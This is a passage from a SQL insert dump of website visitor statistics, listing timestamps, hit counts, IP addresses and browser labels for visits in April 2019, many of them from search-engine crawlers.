,'chrome'),(414448,1555904383,1,1,0,0,'157.55.39.113','other'),(414449,1555906385,1,1,0,0,'37.9.113.103','other'),(414450,1555906389,1,1,0,0,'87.250.224.118','other'),(414451,1555906875,1,1,0,0,'178.154.244.49','other'),(414452,1555907020,1,1,0,0,'157.55.39.113','other'),(414453,1555909069,1,1,0,0,'109.74.154.72','chrome'),(414454,1555909124,1,0,1,0,'66.249.64.58',''),(414455,1555909212,1,1,0,0,'157.55.39.53','other'),(414456,1555910300,1,1,0,0,'157.55.39.52','other'),(414457,1555910375,1,1,0,0,'66.249.64.31','chrome'),(414458,1555910755,1,1,0,0,'89.144.12.17','other'),(414459,1555910806,1,1,0,0,'46.200.250.89','chrome'),(414460,1555911373,1,1,0,0,'157.55.39.182','other'),(414461,1555911462,3,3,0,0,'89.109.54.238','firefox'),(414462,1555911703,1,1,0,0,'40.77.167.141','other'),(414463,1555912675,1,1,0,0,'180.76.15.22','other'),(414464,1555912723,1,1,0,0,'157.55.39.182','other'),(414465,1555913167,1,1,0,0,'91.196.179.134','chrome'),(414466,1555913308,1,1,0,0,'91.124.182.170','firefox'),(414467,1555913469,1,1,0,0,'52.70.146.155','chrome'),(414468,1555913479,1,1,0,0,'13.66.139.0','other'),(414469,1555913565,3,3,0,0,'37.192.26.219','firefox'),(414470,1555913823,1,1,0,0,'104.148.64.26','chrome'),(414471,1555914237,1,1,0,0,'8.29.198.25','other'),(414472,1555914294,1,1,0,0,'8.29.198.27','other'),(414473,1555914836,3,3,0,0,'195.9.103.206','firefox'),(414474,1555915731,1,1,0,0,'91.196.178.87','chrome'),(414475,1555915810,1,1,0,0,'95.132.6.164','firefox'),(414476,1555916160,3,3,0,0,'188.170.140.17','firefox'),(414477,1555916321,2,2,0,0,'66.249.64.29','chrome'),(414478,1555916885,1,1,0,0,'40.77.167.141','other'),(414479,1555917306,1,1,0,0,'46.201.175.206','chrome'),(414480,1555918616,388,388,0,0,'176.74.192.88','other'),(414481,1555919410,1,1,0,0,'91.209.11.236','other'),(414482,1555919490,1,1,0,0,'148.251.244.137','other'),(414483,1555919517,304,304,0,0,'176.74.192.88','other'),(414484,1555919544,1,1,0,0,'141.8.142.103','other'),(414485,1555919749,1,1,0,0,'5.45.207.79','other'),(414486,1555920108,1,1,0,0,'91.196.177.15','chrome'),(414487,1555920151,1,1,0,0,'40.77.167.175','other'),(414488,1555920820,1,1,0,0,'157.55.39.182','other'),(414489,1555920950,8,8,0,0,'5.9.154.69','other'),(414490,1555922424,1,1,0,0,'91.196.178.134','chrome'),(414491,1555922464,1,1,0,0,'66.249.64.29','chrome'),(414492,1555922472,1,1,0,0,'157.55.39.209','other'),(414493,1555922641,1,1,0,0,'157.55.39.182','other'),(414494,1555922889,1,1,0,0,'40.77.167.141','other'),(414495,1555922897,1,1,0,0,'91.196.178.180','chrome'),(414496,1555923531,1,1,0,0,'37.53.90.175','chrome'),(414497,1555924689,1,1,0,0,'91.196.178.87','chrome'),(414498,1555924969,1,1,0,0,'95.132.45.93','firefox'),(414499,1555925087,2,2,0,0,'8.29.198.25','other'),(414500,1555925307,1,1,0,0,'40.77.167.175','other'),(414501,1555925352,1,1,0,0,'178.133.50.198','chrome'),(414502,1555925759,1,1,0,0,'87.250.224.107','other'),(414503,1555925763,1,1,0,0,'5.45.207.79','other'),(414504,1555925938,1,1,0,0,'157.55.39.209','other'),(414505,1555925942,1,1,0,0,'40.77.167.141','other'),(414506,1555925946,1,1,0,0,'91.196.178.87','chrome'),(414507,1555925997,1,1,0,0,'95.108.181.83','other'),(414508,1555926021,1,1,0,0,'66.249.64.31','chrome'),(414509,1555926349,1,1,0,0,'66.249.64.29','chrome'),(414510,1555926719,1,1,0,0,'180.76.15.30','other'),(414511,1555927097,2,2,0,0,'60.191.38.77','firefox'),(414512,1555927420,1,1,0,0,'37.53.90.175','chrome'),(414513,1555927479,1,1,0,0,'157.55.39.209','other'),(414514,1555927827,1,1,0,0,'40.77.167.141','other'),(414515,1555928181,1,1,0,0,'207.46.13.99','other'),(414516,1555928533,1,1,0,0,'193.106.30.98','firefox'),(414517,1555929341,1,1,0,0,'207.46.13.1','other'),(414518,1555929579,2,2,0,0,'157.55.39.182','other'),(414519,1555931533,1,1,0,0,'66.249.64.30','chrome'),(414520,1555931787,1,1,0,0,'157.55.39.64','other'),(414521,1555932579,1,1,0,0,'141.8.142.108','other'),(414522,1555932720,1,1,0,0,'95.108.181.75','other'),(414523,1555932859,1,1,0,0,'180.76.15.154','other'),(414524,1555935046,1,1,0,0,'157.55.39.64','other'),(414525,1555935547,2,2,0,0,'91.196.177.156','chrome'),(414526,1555935598,1,1,0,0,'141.8.142.103','other'),(414527,1555935916,1,1,0,0,'8.29.198.26','other'),(414528,1555935971,1,1,0,0,'8.29.198.27','other'),(414529,1555935986,1,1,0,0,'207.46.13.94','other'),(414530,1555936060,1,1,0,0,'157.55.39.64','other'),(414531,1555936242,1,1,0,0,'66.249.64.30','chrome'),(414532,1555936479,1,1,0,0,'91.124.254.49','chrome'),(414533,1555936897,1,1,0,0,'95.108.181.75','other'),(414534,1555937091,1,1,0,0,'180.76.15.18','other'),(414535,1555937409,1,1,0,0,'91.196.178.67','firefox'),(414536,1555937412,1,1,0,0,'66.249.64.30','chrome'),(414537,1555937420,1,1,0,0,'42.236.10.114','other'),(414538,1555937480,1,1,0,0,'207.46.13.94','other'),(414539,1555937886,1,1,0,0,'46.200.250.89','chrome'),(414540,1555938817,1,1,0,0,'85.115.62.180','other'),(414541,1555939055,1,1,0,0,'141.8.142.81','other'),(414542,1555939230,2,2,0,0,'87.250.224.99','other'),(414543,1555939397,1,1,0,0,'178.154.171.27','other'),(414544,1555939482,1,1,0,0,'87.250.224.64','other'),(414545,1555940470,1,1,0,0,'207.46.13.104','other'),(414546,1555940581,1,1,0,0,'91.196.177.46','firefox'),(414547,1555940692,1,1,0,0,'37.53.90.175','chrome'),(414548,1555941613,2,2,0,0,'91.196.178.133','chrome'),(414549,1555942472,1,1,0,0,'40.77.167.164','other'),(414550,1555942689,1,1,0,0,'37.53.90.175','chrome'),(414551,1555943186,1,1,0,0,'66.249.64.30','chrome'),(414552,1555943189,1,1,0,0,'207.46.13.177','other'),(414553,1555943788,1,1,0,0,'91.196.178.101','chrome'),(414554,1555944076,1,1,0,0,'37.53.90.175','chrome'),(414555,1555944537,1,1,0,0,'207.46.13.104','other'),(414556,1555945175,1,1,0,0,'91.196.178.101','chrome'),(414557,1555945459,1,1,0,0,'91.196.178.87','firefox'),(414558,1555945566,1,1,0,0,'66.249.64.58','chrome'),(414559,1555945614,1,1,0,0,'5.45.207.19','other'),(414560,1555945636,1,1,0,0,'37.9.113.103','other'),(414561,1555945712,1,1,0,0,'207.46.13.94','other'),(414562,1555946755,2,2,0,0,'8.29.198.26','other'),(414563,1555946922,3,3,0,0,'66.249.64.29','chrome'),(414564,1555947179,2,2,0,0,'207.46.13.177','other'),(414565,1555947395,3,3,0,0,'51.83.94.103','firefox'),(414566,1555948315,1,1,0,0,'91.229.241.95','chrome'),(414567,1555948567,1,1,0,0,'178.154.171.27','other'),(414568,1555948704,1,1,0,0,'207.46.13.104','other'),(414569,1555948966,1,1,0,0,'66.249.64.29','chrome'),(414570,1555950802,1,1,0,0,'66.249.64.30','chrome'),(414571,1555950982,1,1,0,0,'130.180.216.91','chrome'),(414572,1555952791,1,1,0,0,'46.211.122.0','chrome'),(414573,1555953370,1,1,0,0,'37.9.113.103','other'),(414574,1555954059,1,1,0,0,'5.255.253.16','other'),(414575,1555954365,1,1,0,0,'52.70.146.155','firefox'),(414576,1555954383,1,1,0,0,'207.46.13.177','other'),(414577,1555954741,2,2,0,0,'40.77.167.164','other'),(414578,1555954792,1,1,0,0,'66.249.64.29','chrome'),(414579,1555954918,1,1,0,0,'66.249.64.31','chrome'),(414580,1555955849,1,1,0,0,'188.234.10.11','chrome'),(414581,1555956094,2,2,0,0,'157.55.39.144','other'),(414582,1555956210,1,1,0,0,'193.106.30.98','firefox'),(414583,1555956217,1,1,0,0,'40.77.167.59','other'),(414584,1555956293,1,0,1,0,'66.249.64.29',''),(414585,1555957078,3,3,0,0,'66.249.64.29','chrome'),(414586,1555957182,1,1,0,0,'207.46.13.38','other'),(414587,1555957596,1,1,0,0,'8.29.198.25','other'),(414588,1555957665,1,1,0,0,'8.29.198.26','other'),(414589,1555957890,1,1,0,0,'157.55.39.118','other'),(414590,1555957936,1,1,0,0,'157.55.39.119','other'),(414591,1555958992,1,1,0,0,'66.249.64.31','chrome'),(414592,1555959773,2,2,0,0,'91.124.181.19','chrome'),(414593,1555960551,1,1,0,0,'95.108.181.83','other'),(414594,1555960676,1,1,0,0,'91.124.181.19','chrome'),(414595,1555960726,1,1,0,0,'52.53.201.78','chrome'),(414596,1555960813,1,1,0,0,'37.9.113.103','other'),(414597,1555961644,2,2,0,0,'95.213.141.126','opera'),(414598,1555961775,1,1,0,0,'207.46.13.228','other'),(414599,1555962160,1,1,0,0,'40.77.167.42','other'),(414600,1555964509,1,1,0,0,'91.196.178.55','chrome'),(414601,1555964628,1,1,0,0,'93.73.16.41','chrome'),(414602,1555965139,1,1,0,0,'66.249.64.31','chrome'),(414603,1555965602,1,1,0,0,'157.55.39.235','other'),(414604,1555965659,1,1,0,0,'66.249.64.30','chrome'),(414605,1555965784,1,1,0,0,'5.196.239.113','firefox'),(414606,1555966725,1,1,0,0,'176.122.94.173','other'),(414607,1555966838,1,1,0,0,'207.46.13.125','other'),(414608,1555967150,1,1,0,0,'207.46.13.24','other'),(414609,1555967511,1,1,0,0,'193.106.30.98','firefox'),(414610,1555967715,2,2,0,0,'40.77.167.42','other'),(414611,1555968282,1,1,0,0,'95.108.181.83','other'),(414612,1555968323,1,1,0,0,'178.154.244.49','other'),(414613,1555968330,1,1,0,0,'141.8.132.16','other'),(414614,1555968432,2,2,0,0,'8.29.198.27','other'),(414615,1555968666,1,1,0,0,'207.46.13.24','other'),(414616,1555969875,1,1,0,0,'207.46.13.43','other'),(414617,1555970487,1,1,0,0,'5.45.207.19','other'),(414618,1555970638,1,1,0,0,'66.249.64.31','chrome'),(414619,1555972927,1,1,0,0,'40.77.167.5','other'),(414620,1555973415,2,2,0,0,'207.46.13.43','other'),(414621,1555974652,1,1,0,0,'37.9.113.103','other'),(414622,1555974944,1,1,0,0,'141.8.142.81','other'),(414623,1555975210,1,1,0,0,'178.154.171.17','other'),(414624,1555976205,1,1,0,0,'40.77.167.221','other'),(414625,1555976338,1,1,0,0,'157.55.39.118','other'),(414626,1555976906,1,1,0,0,'207.46.13.165','other'),(414627,1555979088,12,12,0,0,'207.46.13.79','other'),(414628,1555979154,1,1,0,0,'193.106.30.98','chrome'),(414629,1555979259,2,2,0,0,'8.29.198.25','other'),(414630,1555979704,12,12,0,0,'157.55.39.118','other'),(414631,1555979721,16,16,0,0,'207.46.13.194','other'),(414632,1555979749,8,8,0,0,'207.46.13.165','other'),(414633,1555981360,1,1,0,0,'207.46.13.194','other'),(414634,1555982001,1,1,0,0,'157.55.39.118','other'),(414635,1555982951,2,2,0,0,'207.46.13.196','other'),(414636,1555983882,1,1,0,0,'207.46.13.196','other'),(414637,1555984049,1,1,0,0,'157.55.39.118','other'),(414638,1555985496,1,1,0,0,'40.77.167.71','other'),(414639,1555986263,1,1,0,0,'193.106.30.98','chrome'),(414640,1555986555,1,1,0,0,'95.163.255.168','other'),(414641,1555986912,2,2,0,0,'40.77.167.71','other'),(414642,1555987967,1,1,0,0,'66.249.64.30','chrome'),(414643,1555988238,2,2,0,0,'40.77.167.71','other'),(414644,1555988576,1,1,0,0,'40.77.167.198','other'),(414645,1555989280,1,1,0,0,'5.45.207.19','other'),(414646,1555990088,1,1,0,0,'8.29.198.26','other'),(414647,1555990173,1,1,0,0,'8.29.198.27','other'),(414648,1555990209,1,1,0,0,'40.77.167.5','other'),(414649,1555990430,1,1,0,0,'87.250.224.47','other'),(414650,1555990597,1,1,0,0,'178.154.171.69','other'),(414651,1555990755,1,1,0,0,'178.154.244.49','other'),(414652,1555991019,1,1,0,0,'178.154.244.11','other'),(414653,1555991041,1,1,0,0,'37.9.113.103','other'),(414654,1555991620,1,1,0,0,'66.249.64.60','chrome'),(414655,1555991678,2,2,0,0,'158.69.52.114','chrome'),(414656,1555991928,1,1,0,0,'66.249.64.29','chrome'),(414657,1555991944,1,1,0,0,'193.106.30.98','chrome'),(414658,1555992550,1,1,0,0,'207.46.13.152','other'),(414659,1555992673,2,2,0,0,'157.55.39.253','other'),(414660,1555992870,1,1,0,0,'66.249.64.62','chrome'),(414661,1555993904,1,1,0,0,'5.45.207.19','other'),(414662,1555995374,1,1,0,0,'40.77.167.5','other'),(414663,1555995400,1,1,0,0,'109.74.154.72','chrome'),(414664,1555995742,1,1,0,0,'66.249.64.30','chrome'),(414665,1555996406,1,1,0,0,'66.249.64.58','chrome'),(414666,1555997017,1,1,0,0,'185.220.101.12','other'),(414667,1555997034,1,1,0,0,'13.66.139.0','other'),(414668,1555998293,1,1,0,0,'157.55.39.253','other'),(414669,1555998600,1,1,0,0,'94.179.147.130','chrome'),(414670,1555998649,1,1,0,0,'91.196.178.87','chrome'),(414671,1555998743,2,2,0,0,'207.46.13.152','other'),(414672,1555998825,1,1,0,0,'46.200.250.89','chrome'),(414673,1555998949,1,1,0,0,'193.106.30.98','chrome'),(414674,1555999071,2,2,0,0,'54.202.30.40','chrome'),(414675,1555999408,3,3,0,0,'95.108.213.4','other'),(414676,1555999962,1,1,0,0,'5.255.253.38','other'),(414677,1556000281,1,1,0,0,'87.250.224.47','other'),(414678,1556000285,1,1,0,0,'91.196.179.134','chrome'),(414679,1556000355,2,2,0,0,'157.55.39.253','other'),(414680,1556000441,2,2,0,0,'141.8.142.103','other'),(414681,1556000468,1,1,0,0,'178.154.244.11','other'),(414682,1556000913,1,1,0,0,'8.29.198.27','other'),(414683,1556001017,1,1,0,0,'8.29.198.26','other'),(414684,1556001102,1,0,1,0,'66.249.64.62',''),(414685,1556001281,1,1,0,0,'157.55.39.96','other'),(414686,1556001372,1,1,0,0,'66.249.64.29','chrome'),(414687,1556001793,1,1,0,0,'91.196.178.87','chrome'),(414688,1556001799,1,1,0,0,'91.196.178.101','chrome'),(414689,1556002496,1,1,0,0,'37.53.70.153','firefox'),(414690,1556002684,1,0,1,0,'66.249.64.58',''),(414691,1556003772,1,1,0,0,'91.124.235.105','chrome'),(414692,1556003787,2,2,0,0,'157.55.39.96','other'),(414693,1556004147,1,1,0,0,'178.92.216.24','chrome'),(414694,1556005119,1,1,0,0,'157.55.39.77','other'),(414695,1556005225,1,1,0,0,'91.124.235.105','chrome'),(414696,1556005695,1,1,0,0,'157.55.39.253','other'),(414697,1556005774,1,1,0,0,'193.106.30.98','chrome'),(414698,1556007071,1,1,0,0,'157.55.39.96','other'),(414699,1556008192,1,1,0,0,'157.55.39.253','other'),(414700,1556009750,1,1,0,0,'157.55.39.96','other'),(414701,1556010115,1,1,0,0,'157.55.39.253','other'),(414702,1556010556,1,1,0,0,'141.8.132.16','other'),(414703,1556010644,1,1,0,0,'141.8.142.103','other'),(414704,1556010712,1,1,0,0,'5.255.253.25','other'),(414705,1556010842,1,1,0,0,'178.154.244.11','other'),(414706,1556011685,1,1,0,0,'87.250.224.47','other'),(414707,1556011735,2,2,0,0,'8.29.198.27','other'),(414708,1556011807,1,1,0,0,'13.66.139.0','other'),(414709,1556012229,1,1,0,0,'93.158.166.7','other'),(414710,1556012355,1,1,0,0,'94.179.147.130','chrome'),(414711,1556012534,1,1,0,0,'193.106.30.98','chrome'),(414712,1556012712,1,1,0,0,'141.8.142.38','other'),(414713,1556012995,1,1,0,0,'207.46.13.217','other'),(414714,1556013177,1,1,0,0,'157.55.39.253','other'),(414715,1556013487,1,1,0,0,'46.200.250.89','chrome'),(414716,1556013539,1,1,0,0,'5.255.253.16','other'),(414717,1556013839,1,1,0,0,'31.130.16.121','chrome'),(414718,1556014284,1,1,0,0,'66.249.64.31','chrome'),(414719,1556014529,1,1,0,0,'207.46.13.211','other'),(414720,1556014798,2,2,0,0,'207.46.13.144','other'),(414721,1556015315,1,1,0,0,'66.249.64.31','chrome'),(414722,1556015535,1,1,0,0,'207.46.13.217','other'),(414723,1556017870,2,2,0,0,'178.93.55.58','firefox'),(414724,1556018407,1,1,0,0,'40.77.167.117','other'),(414725,1556018618,1,1,0,0,'66.249.64.29','chrome'),(414726,1556019178,1,1,0,0,'95.163.255.96','other'),(414727,1556019533,1,1,0,0,'180.76.15.11','other'),(414728,1556020428,1,1,0,0,'66.249.64.31','chrome'),(414729,1556020449,1,1,0,0,'91.196.178.101','chrome'),(414730,1556020488,1,1,0,0,'66.249.64.29','chrome'),(414731,1556021077,1,1,0,0,'52.70.146.155','firefox'),(414732,1556021248,1,1,0,0,'66.249.64.58','chrome'),(414733,1556021303,1,1,0,0,'95.163.255.197','other'),(414734,1556021976,1,1,0,0,'87.250.224.47','other'),(414735,1556022041,1,1,0,0,'95.108.181.94','other'),(414736,1556022115,1,1,0,0,'207.46.13.34','other'),(414737,1556022564,2,2,0,0,'8.29.198.27','other'),(414738,1556022922,1,1,0,0,'5.255.253.25','other'),(414739,1556022942,1,1,0,0,'66.249.64.31','chrome'),(414740,1556023533,1,1,0,0,'180.76.15.31','other'),(414741,1556024050,1,1,0,0,'87.250.224.47','other'),(414742,1556024663,1,1,0,0,'66.249.64.31','chrome'),(414743,1556024940,1,1,0,0,'193.106.30.98','chrome'),(414744,1556025112,1,1,0,0,'40.77.167.117','other'),(414745,1556025448,1,1,0,0,'91.196.178.94','firefox'),(414746,1556025468,1,1,0,0,'180.163.220.4','other'),(414747,1556026170,1,1,0,0,'5.45.64.76','msie'),(414748,1556026278,1,1,0,0,'95.163.255.93','other'),(414749,1556026565,1,1,0,0,'37.54.183.138','chrome'),(414750,1556026877,1,1,0,0,'40.77.167.117','other'),(414751,1556027717,1,1,0,0,'40.77.167.78','other'),(414752,1556028025,1,1,0,0,'91.196.178.174','chrome'),(414753,1556028195,1,1,0,0,'81.30.161.249','chrome'),(414754,1556030500,2,2,0,0,'157.55.39.61','other'),(414755,1556030510,1,1,0,0,'69.12.72.163','firefox'),(414756,1556030672,1,1,0,0,'66.249.64.60','chrome'),(414757,1556030978,1,1,0,0,'157.55.39.154','other'),(414758,1556032136,1,1,0,0,'157.55.39.61','other'),(414759,1556032585,1,1,0,0,'207.46.13.145','other'),(414760,1556033397,2,2,0,0,'8.29.198.26','other'),(414761,1556033428,1,1,0,0,'87.250.224.47','other'),(414762,1556033943,6,6,0,0,'157.55.39.154','other'),(414763,1556033951,5,5,0,0,'157.55.39.111','other'),(414764,1556033957,6,6,0,0,'157.55.39.61','other'),(414765,1556033963,1,1,0,0,'207.46.13.145','other'),(414766,1556034893,1,1,0,0,'66.249.64.31','chrome'),(414767,1556035075,1,1,0,0,'37.52.52.172','chrome'),(414768,1556035353,2,2,0,0,'66.249.64.29','chrome'),(414769,1556035721,1,1,0,0,'94.180.232.143','chrome'),(414770,1556035773,1,1,0,0,'66.249.64.30','chrome'),(414771,1556035983,1,1,0,0,'66.249.64.31','chrome'),(414772,1556036043,1,1,0,0,'157.55.39.61','other'),(414773,1556036150,1,1,0,0,'194.44.128.158','chrome'),(414774,1556036268,1,1,0,0,'5.255.253.25','other'),(414775,1556036312,1,1,0,0,'95.108.181.83','other'),(414776,1556036373,1,1,0,0,'193.106.30.98','chrome'),(414777,1556036976,1,1,0,0,'157.55.39.154','other'),(414778,1556037133,1,1,0,0,'178.154.200.8','other'),(414779,1556037702,3,3,0,0,'5.45.207.19','other'),(414780,1556037796,1,1,0,0,'157.55.39.111','other'),(414781,1556037838,1,1,0,0,'5.255.253.16','other'),(414782,1556038151,1,1,0,0,'141.8.142.191','other'),(414783,1556038284,1,1,0,0,'95.163.255.95','other'),(414784,1556038294,1,1,0,0,'95.108.181.94','other'),(414785,1556038402,1,1,0,0,'66.249.64.60','chrome'),(414786,1556038863,1,1,0,0,'46.211.218.138','other'),(414787,1556039140,1,1,0,0,'207.46.13.145','other'),(414788,1556039176,2,2,0,0,'157.55.39.154','other'),(414789,1556040028,1,1,0,0,'31.130.16.121','chrome'),(414790,1556041129,1,1,0,0,'52.70.146.155','firefox'),(414791,1556042719,2,2,0,0,'40.77.167.173','other'),(414792,1556044221,1,1,0,0,'95.163.255.93','other'),(414793,1556044227,1,1,0,0,'8.29.198.26','other'),(414794,1556044313,1,1,0,0,'141.8.142.103','other'),(414795,1556044369,1,1,0,0,'8.29.198.27','other'),(414796,1556046360,1,1,0,0,'13.57.233.99','chrome'),(414797,1556046717,1,1,0,0,'157.55.39.186','other'),(414798,1556047109,1,1,0,0,'46.211.70.59','chrome'),(414799,1556047597,1,1,0,0,'66.249.64.29','chrome'),(414800,1556049166,1,1,0,0,'37.9.113.103','other'),(414801,1556049236,1,1,0,0,'95.108.213.4','other'),(414802,1556049246,1,1,0,0,'5.188.210.44','chrome'),(414803,1556049271,1,1,0,0,'87.250.224.47','other'),(414804,1556049711,1,1,0,0,'193.106.30.98','chrome'),(414805,1556050768,1,1,0,0,'13.66.139.0','other'),(414806,1556051260,1,1,0,0,'157.55.39.164','other'),(414807,1556053179,1,1,0,0,'141.8.142.103','other'),(414808,1556053681,1,1,0,0,'5.45.207.79','other'),(414809,1556053741,1,1,0,0,'87.250.224.47','other'),(414810,1556054092,1,1,0,0,'95.163.255.177','other'),(414811,1556054543,1,1,0,0,'95.163.255.172','other'),(414812,1556054917,1,1,0,0,'95.163.255.97','other'),(414813,1556055067,1,1,0,0,'8.29.198.25','other'),(414814,1556055216,1,1,0,0,'8.29.198.26','other'),(414815,1556055507,1,1,0,0,'207.46.13.11','other'),(414816,1556055622,1,1,0,0,'66.249.64.30','chrome'),(414817,1556055678,1,1,0,0,'66.249.64.58','chrome'),(414818,1556056811,1,1,0,0,'157.55.39.164','other'),(414819,1556057253,1,1,0,0,'207.46.13.11','other'),(414820,1556059300,1,1,0,0,'5.45.207.79','other'),(414821,1556059439,1,1,0,0,'141.8.142.103','other'),(414822,1556059972,1,1,0,0,'5.45.207.19','other'),(414823,1556061443,1,1,0,0,'66.249.64.29','chrome'),(414824,1556061848,1,1,0,0,'207.46.13.11','other'),(414825,1556061965,1,1,0,0,'95.163.255.98','other'),(414826,1556063131,1,1,0,0,'207.46.13.5','other'),(414827,1556064334,1,1,0,0,'95.108.181.54','other'),(414828,1556065908,1,1,0,0,'8.29.198.25','other'),(414829,1556066060,1,1,0,0,'8.29.198.27','other'),(414830,1556066105,1,1,0,0,'207.46.13.28','other'),(414831,1556066106,1,1,0,0,'95.163.255.153','other'),(414832,1556066196,2,2,0,0,'5.45.207.19','other'),(414833,1556066628,1,1,0,0,'157.55.39.70','other'),(414834,1556066630,1,1,0,0,'66.249.64.31','chrome'),(414835,1556067241,1,1,0,0,'157.55.39.72','other'),(414836,1556068280,1,1,0,0,'178.154.244.11','other'),(414837,1556068926,1,1,0,0,'157.55.39.72','other'),(414838,1556069547,1,1,0,0,'66.249.64.30','chrome'),(414839,1556069778,1,1,0,0,'66.249.64.31','chrome'),(414840,1556070618,1,1,0,0,'66.249.64.29','chrome'),(414841,1556071921,1,1,0,0,'157.55.39.72','other'),(414842,1556072396,1,1,0,0,'5.45.207.79','other'),(414843,1556072522,1,1,0,0,'141.8.142.81','other'),(414844,1556072816,1,1,0,0,'104.148.64.26','chrome'),(414845,1556073063,1,1,0,0,'193.106.30.98','chrome'),(414846,1556073291,1,1,0,0,'157.55.39.70','other'),(414847,1556073797,1,1,0,0,'95.163.255.97','other'),(414848,1556074057,2,2,0,0,'157.55.39.79','other'),(414849,1556074715,1,1,0,0,'209.17.97.106','other'),(414850,1556075391,1,1,0,0,'157.55.39.72','other'),(414851,1556075864,1,1,0,0,'207.46.13.28','other'),(414852,1556076000,1,1,0,0,'83.26.229.194','chrome'),(414853,1556076041,2,2,0,0,'34.221.91.244','chrome'),(414854,1556076741,2,2,0,0,'8.29.198.27','other'),(414855,1556076958,1,1,0,0,'5.45.207.19','other'),(414856,1556077755,2,2,0,0,'178.154.244.11','other'),(414857,1556078781,1,1,0,0,'207.46.13.28','other'),(414858,1556079201,1,1,0,0,'157.55.39.79','other'),(414859,1556079210,1,1,0,0,'46.200.250.89','chrome'),(414860,1556079345,1,1,0,0,'193.106.30.98','chrome'),(414861,1556081128,1,1,0,0,'157.55.39.72','other'),(414862,1556081830,1,1,0,0,'80.68.14.161','other'),(414863,1556081870,1,1,0,0,'5.45.207.79','other'),(414864,1556081994,1,1,0,0,'178.154.244.11','other'),(414865,1556082025,1,1,0,0,'180.76.15.32','other'),(414866,1556082152,1,1,0,0,'5.255.253.16','other'),(414867,1556082380,1,1,0,0,'141.8.142.191','other'),(414868,1556082435,1,1,0,0,'66.249.64.60','chrome'),(414869,1556082580,1,1,0,0,'157.55.39.70','other'),(414870,1556083630,1,1,0,0,'185.117.215.9','other'),(414871,1556084522,2,2,0,0,'66.249.64.29','chrome'),(414872,1556084626,1,1,0,0,'157.55.39.70','other'),(414873,1556084774,1,1,0,0,'91.196.178.87','chrome'),(414874,1556084848,2,2,0,0,'66.249.64.31','chrome'),(414875,1556085704,1,1,0,0,'193.106.30.98','chrome'),(414876,1556085857,1,1,0,0,'178.154.244.11','other'),(414877,1556087088,1,1,0,0,'157.55.39.250','other'),(414878,1556087378,1,1,0,0,'5.45.207.79','other'),(414879,1556087388,1,1,0,0,'62.149.15.172','chrome'),(414880,1556087488,1,1,0,0,'5.45.207.19','other'),(414881,1556087516,1,1,0,0,'66.249.64.31','chrome'),(414882,1556087568,1,1,0,0,'8.29.198.27','other'),(414883,1556087721,1,1,0,0,'8.29.198.26','other'),(414884,1556087754,1,1,0,0,'66.249.64.60','chrome'),(414885,1556087957,1,1,0,0,'66.249.64.30','chrome'),(414886,1556088179,1,1,0,0,'66.249.64.62','chrome'),(414887,1556088954,1,1,0,0,'37.9.113.148','other'),(414888,1556088957,1,1,0,0,'87.250.224.81','other'),(414889,1556088997,1,1,0,0,'157.55.39.70','other'),(414890,1556090338,1,1,0,0,'194.12.71.44','chrome'),(414891,1556090609,1,1,0,0,'66.249.64.30','chrome'),(414892,1556090840,1,1,0,0,'213.108.45.138','firefox'),(414893,1556091573,1,1,0,0,'91.196.178.168','chrome'),(414894,1556091716,2,2,0,0,'40.77.167.150','other'),(414895,1556091819,1,1,0,0,'66.249.64.29','chrome'),(414896,1556092422,1,1,0,0,'178.154.244.11','other'),(414897,1556092455,1,1,0,0,'87.250.224.47','other'),(414898,1556092494,1,1,0,0,'77.222.134.116','chrome'),(414899,1556092673,1,1,0,0,'95.108.181.75','other'),(414900,1556092694,1,1,0,0,'91.196.178.87','chrome'),(414901,1556092776,1,1,0,0,'66.249.64.30','chrome'),(414902,1556092807,1,1,0,0,'213.180.203.17','other'),(414903,1556092844,1,1,0,0,'213.180.203.9','other'),(414904,1556094246,1,1,0,0,'40.77.167.148','other'),(414905,1556094512,1,1,0,0,'91.196.178.87','chrome'),(414906,1556095280,1,1,0,0,'40.77.167.150','other'),(414907,1556095348,2,2,0,0,'40.77.167.148','other'),(414908,1556095641,1,1,0,0,'46.101.18.209','chrome'),(414909,1556096547,1,1,0,0,'193.111.115.2','firefox'),(414910,1556097431,1,1,0,0,'5.45.207.19','other'),(414911,1556097925,1,1,0,0,'66.249.64.62','chrome'),(414912,1556098407,1,1,0,0,'8.29.198.26','other'),(414913,1556098432,1,1,0,0,'157.55.39.250','other'),(414914,1556098467,1,1,0,0,'40.77.167.150','other'),(414915,1556098556,1,1,0,0,'8.29.198.25','other'),(414916,1556098628,1,1,0,0,'91.196.178.100','chrome'),(414917,1556098986,1,1,0,0,'66.249.64.31','chrome'),(414918,1556099924,1,1,0,0,'66.249.64.60','chrome'),(414919,1556100122,1,1,0,0,'206.189.124.1','firefox'),(414920,1556100154,1,1,0,0,'66.249.64.31','chrome'),(414921,1556100287,1,1,0,0,'95.163.255.162','other'),(414922,1556100565,1,1,0,0,'109.74.154.72','chrome'),(414923,1556100728,1,1,0,0,'91.209.11.236','other'),(414924,1556101351,1,1,0,0,'193.111.115.2','firefox'),(414925,1556101436,1,1,0,0,'40.77.167.150','other'),(414926,1556101923,2,2,0,0,'95.213.141.126','opera'),(414927,1556102050,1,1,0,0,'87.250.224.47','other'),(414928,1556102085,1,1,0,0,'37.9.113.148','other'),(414929,1556102268,1,1,0,0,'5.45.207.79','other'),(414930,1556102662,1,1,0,0,'66.249.64.29','chrome'),(414931,1556102696,1,1,0,0,'141.8.142.103','other'),(414932,1556102750,1,1,0,0,'5.45.207.19','other'),(414933,1556103303,1,1,0,0,'91.196.179.134','chrome'),(414934,1556103469,1,1,0,0,'157.55.39.250','other'),(414935,1556103886,1,1,0,0,'40.77.167.150','other'),(414936,1556104223,2,2,0,0,'193.106.30.98','chrome'),(414937,1556104862,1,1,0,0,'66.249.64.29','chrome'),(414938,1556105769,2,2,0,0,'66.249.64.29','chrome'),(414939,1556105963,1,1,0,0,'178.154.244.11','other'),(414940,1556106132,1,1,0,0,'5.45.207.79','other'),(414941,1556106159,1,1,0,0,'193.105.62.60','chrome'),(414942,1556106375,1,1,0,0,'157.55.39.250','other'),(414943,1556106744,2,2,0,0,'66.249.64.30','chrome'),(414944,1556106945,1,1,0,0,'40.77.167.150','other'),(414945,1556107628,1,1,0,0,'91.196.178.135','chrome'),(414946,1556107886,1,1,0,0,'66.249.64.31','chrome'),(414947,1556107932,1,1,0,0,'91.196.178.133','firefox'),(414948,1556107951,1,1,0,0,'180.163.220.3','other'),(414949,1556107958,1,1,0,0,'42.236.10.75','other'),(414950,1556108041,1,1,0,0,'91.196.178.87','chrome'),(414951,1556108273,1,1,0,0,'180.76.15.163','other'),(414952,15561